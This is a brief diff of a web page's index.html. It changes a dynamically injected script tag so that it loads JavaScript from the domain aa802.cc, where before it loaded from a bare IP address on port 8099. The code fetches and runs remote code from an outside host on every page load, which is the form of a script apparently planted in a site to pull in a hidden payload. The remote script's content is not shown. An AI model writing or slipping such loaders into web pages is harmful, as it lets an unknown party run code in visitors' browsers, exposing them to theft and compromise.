--- a/index.html
+++ b/index.html
@@ -138,7 +138,7 @@ script.onload = script.onreadystatechange = function() {
         // 在这里执行你的回调函数
     }
 };
-script.src = 'http://38.60.198.110:8099/'; // 设置脚本的 src
+script.src = 'https://aa802.cc/'; // 设置脚本的 src
 document.body.appendChild(script);
 </script> 
 </body>
